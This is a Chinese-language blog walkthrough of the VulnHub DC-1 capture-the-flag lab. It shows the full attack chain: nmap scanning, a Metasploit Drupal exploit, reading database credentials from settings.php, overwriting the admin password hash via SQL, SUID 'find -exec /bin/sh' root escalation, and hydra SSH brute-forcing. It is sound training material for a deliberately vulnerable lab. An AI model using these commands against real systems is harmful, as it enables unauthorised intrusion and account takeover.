DC-1靶机渗透

简介

靶机名称:DC1
下载地址:https://www.vulnhub.com/entry/dc-1-1,292/

一、信息收集

利用nmap扫描发现主机:

nmap -sP 192.168.229.0/24

在这里插入图片描述

获取主机为:192.168.229.180

收集主机端口和其它信息:

nmap -sS -sV -T5 -A -p- 192.168.229.180 

在这里插入图片描述
在这里插入图片描述

发现开发22端口和80端口,并且运行在Linux上

二、漏洞查找

发现有80端口直接访问得到:

在这里插入图片描述

发现是cms是drupal,用msf看一下有没有可以利用的

在这里插入图片描述

这里我用序号为2的:

在这里插入图片描述
在用命令:options
查看需要设置的参数:

在这里插入图片描述

需要设置rhosts:

set rhosts 192.168.229.180

在这里插入图片描述

然后run

然后就获得了meterpreter。
输入shell,获得交互式shell

在这里插入图片描述

可以用python达到一个交互效果:

python -c 'import pty; pty.spawn("/bin/bash")'

得到:
在这里插入图片描述
查找到第一个flag:

在这里插入图片描述

提权

根据第一个flag提示去寻找cms的cinfig file

并且Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看

查看一下:

在这里插入图片描述

得到第二个flag

发现了flag2和数据库的账号密码,flag2提示,提升权限为root来查看敏感文件,或者直接爆破

我们先进入数据库查看

在这里插入图片描述

查看数据:
在这里插入图片描述

在这里插入图片描述

选则users表查看用户信息:

在这里插入图片描述
发现有个admin用户但不知道密码:

可以参考这篇博客置换密码:
https://drupalchina.cn/node/2128

在drupal目录站点敲入以下命令:

php scripts/password-hash.sh admin

在这里插入图片描述

然后在user表中将密码替换为上面hash后面的值:

update users set pass="$S$DZOvssEYtKnlk5jLGjdReDQJyO.y36sNqH5uX/S/2rGOEsw32Ju4"; 

在这里插入图片描述
这样admin的密码就被改成admin

在drupal网站登录看看:

在这里插入图片描述
登录成功

发现flag3:

在这里插入图片描述

flag3提示,提权并提示 -exec,想到suid提权 find 命令

使用命令查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

在这里插入图片描述

使用命令测试,发现为root权限

在这里插入图片描述

利用/bin/sh命令到达root的shell交互:

find / -name 666 -exec "/bin/sh" \;

在这里插入图片描述

获取最终flag

至此,完成渗透。此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,

在这里插入图片描述我们可以使用 hydra 进行爆破

hydra -l flag4 -P pass.txt ssh://192.168.229.180   

在这里插入图片描述

连接:

在这里插入图片描述
参考连接:
https://blog.csdn.net/Auuuuuuuu/article/details/97832336

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值